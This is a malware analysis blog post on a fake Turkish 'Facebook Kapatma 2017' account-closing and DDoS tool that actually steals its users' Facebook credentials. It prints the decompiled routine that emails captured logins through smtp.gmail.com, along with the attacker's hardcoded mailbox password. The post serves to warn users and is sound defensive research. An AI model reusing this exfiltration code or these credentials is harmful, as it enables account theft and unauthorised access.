Last month security researchers discovered Facebook password stealer malware
with njRat. This month we got another malware which claims that it can target
a given profile and perform DDoS. But it actually a password stealer and it
targets the Turkish users.
Static Analysis of
the sample (code analysis)
MD5: F7BED7CD45A98275470707E54976C009
File Type: 32-Bit Exe
Size: 845824 Byte(s)![]() |
Figure 1 CompilerDetect -> .NET
|
The malware is compiled using .Net and we started to work on
the strings and code analysis of this sample. When we looked in to the strings,
we found very interesting details:
·
0000000CCA0D
0000004CE60D 0 Account Close
·
0000000CCA29
0000004CE629 0 CheckBox3
·
0000000CCA63
0000004CE663 0 ProgressBar1
·
0000000CCA7D
0000004CE67D 0 Label4
·
0000000CCADF
0000004CE6DF 0 $this.BackgroundImage
·
0000000CCB0B
0000004CE70B 0 $this.Icon
·
0000000CCB21
0000004CE721 0 FACEBOOK
·
0000000CCB33
0000004CE733 0 FACEBOOK KAPATMA 2017
·
0000000CCB5F
0000004CE75F 0 Login Successful Account will be closed
within 5 minutes.
·
0000000CCBD3 0000004CE7D3 0
furkanbabalog(at)gmail.com
·
0000000CCC03 0000004CE803 0
smtp.gmail.com
·
0000000CCC21 0000004CE821 0
sanane123
·
0000000CCC35 0000004CE835 0
Facebook_Kapatma_2017.Resources
·
0000000CDB66
0000004D2166 0 VS_VERSION_INFO
·
0000000CDBC2
0000004D21C2 0 VarFileInfo
·
0000000CDBE2
0000004D21E2 0 Translation
·
0000000CDC06
0000004D2206 0 StringFileInfo
·
0000000CDC2A
0000004D222A 0 000004b0
·
0000000CDC42
0000004D2242 0 FileDescription
·
0000000CDC64
0000004D2264 0 Facebook Kapatma 2017
·
0000000CDC96
0000004D2296 0 FileVersion
·
0000000CDCB0
0000004D22B0 0 1.0.0.0
·
0000000CDCC6
0000004D22C6 0 InternalName
·
0000000CDCE0
0000004D22E0 0 Facebook Kapatma 2017.exe
File description, resource details and email credentials (highlighted in red colours) are found inside the sample. Using this credential, we tried to login and stop the victim. But Gmail stops to verify that device isn’t recognise. It probably place holder account for hacker.
![]() |
Figure 2 Gmail security ask for
verification
|
File resources showing image as background which appears like hackers in movie posters.
![]() |
Figure 3 Background Image
|
![]() |
Figure 4 Facebook Kapatma |
‘Kapatma’ is a Turkish word and it means ‘close down’. The
above image is the detail of the classes found in the code. Inside the code we
find input details as in the checkbox and label.
this.Label1.Text = "E-posta"; // E-posta
means email.
this.Label2.Text = "Şifre";
// Şifre means password.
this.CheckBox1.Text =
"Ddos Attack";
this.Button1.Text =
"Hesabı Kapat"; // Hesabi kapat means close account.
this.Label3.Text =
"URL:";
this.CheckBox3.Text =
"Complaint Attack\r\n";
this.Label4.Text =
"NOT:Hesap 5Dakika İçerisinde Kapatılır ! "; // Acc. Closed Within 5
Min
The purpose is to collect the Facebook credentials to login
in the tool and mentioned url will be the profile to be attacked. Let see how
the collected details will be transferred.
private void Button1_Click(object
sender, EventArgs e)
{ MailMessage mailMessage
= new MailMessage();
Try {
Interaction.MsgBox("Login
Successful Account will be closed within 5 minutes.", MsgBoxStyle.OkOnly,
null);
mailMessage.From = new
MailAddress("furkanbabalog(at)gmail.com");
mailMessage.To.Add("furkanbabalog(at)gmail.com");
mailMessage.Subject =
this.TextBox1.Text;
mailMessage.Body =
this.TextBox2.Text;
new
SmtpClient("smtp.gmail.com")
{Port = 587,
EnableSsl = true,
Credentials = new
NetworkCredential("furkanbabalog(at)gmail.com", "sanane123")
}.Send(mailMessage);
}
The above code snippet shows that the collected credentials
are send us email by login to the given gmail account and sent the detail to
same account (i.e.) from and to address are same email address only.
Behavioural analysis
![]() |
Figure 5 GUI of the fake tool
|
We entered random text inside the text box, selected all the
boxes. Once we clicked the button, message box appears as login successful
account will be closed in 5 minutes.
![]() |
Figure 6 Login successful message box
|
No any file traces and registry traces are added after the
execution of this malware.
Conclusion:
We are seeing this emerging trend as Facebook hacking tools
and DDoS tools which actually steals the tool user credentials and not the
given target. It is high time to educate the user that these tools are fake
tools - password stealer and not a hack tool or crack tool. In this case, it
targets Turkish people and we may expect these kind of tools to other part of
the world.
No comments:
Post a Comment